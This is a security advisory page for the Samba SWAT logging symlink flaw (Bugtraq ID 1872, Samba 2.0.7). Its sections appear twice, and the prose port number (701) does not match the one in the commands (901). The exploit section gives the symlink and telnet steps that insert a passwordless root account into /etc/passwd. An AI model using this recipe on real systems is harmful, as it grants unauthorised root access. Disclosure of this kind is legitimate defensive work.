SAMBA SWAT Symlink Vulnerability
BID:1872
Info
SAMBA SWAT Symlink Vulnerability
| Bugtraq ID: | 1872 |
| Class: | Origin Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Nov 01 2000 12:00AM |
| Updated: | Nov 01 2000 12:00AM |
| Credit: | This vulnerability was dicovered by Miah <[email protected]>. |
| Vulnerable: |
Samba Samba 2.0.7 |
| Not Vulnerable: | |
Discussion
SAMBA SWAT Symlink Vulnerability
The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access.
This problem in particular is a symlink problem where user can take advantage of poor programming in SWAT's logging facilities (which are not enabled by default) to overwrite files with user specified data. In this case, the logging is enabled under SWAT it logs by default to:
/tmp/cgi.log
This file logs all traffic to the web service, regrettably this file does not have restrictive permissions set on it and local users may symlink
the file to any other file (which they have read access to) on the system. They can then connect to the port in question (701 by default) and have the data they type in entered into a file of their choice, typically /etc/passwd .
The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access.
This problem in particular is a symlink problem where user can take advantage of poor programming in SWAT's logging facilities (which are not enabled by default) to overwrite files with user specified data. In this case, the logging is enabled under SWAT it logs by default to:
/tmp/cgi.log
This file logs all traffic to the web service, regrettably this file does not have restrictive permissions set on it and local users may symlink
the file to any other file (which they have read access to) on the system. They can then connect to the port in question (701 by default) and have the data they type in entered into a file of their choice, typically /etc/passwd .
Exploit / POC
SAMBA SWAT Symlink Vulnerability
From the BUGTRAQ post on this issue (included in full in the 'Credit' section):
ln -s /tmp/cgi.log /etc/passwd
telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--
We now have the following entry in our /etc/passwd file:
[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash
From the BUGTRAQ post on this issue (included in full in the 'Credit' section):
ln -s /tmp/cgi.log /etc/passwd
telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--
We now have the following entry in our /etc/passwd file:
[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash
Solution / Fix
SAMBA SWAT Symlink Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Samba Samba 2.0.7
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Samba Samba 2.0.7
-
Miah Unoffical Patch
http://uberhax0r.net/~miah/swat/
References
SAMBA SWAT Symlink Vulnerability
References:
References:
- Samba Homepage (Samba)
- Writeup on the SWAT Vulnerability (Miah)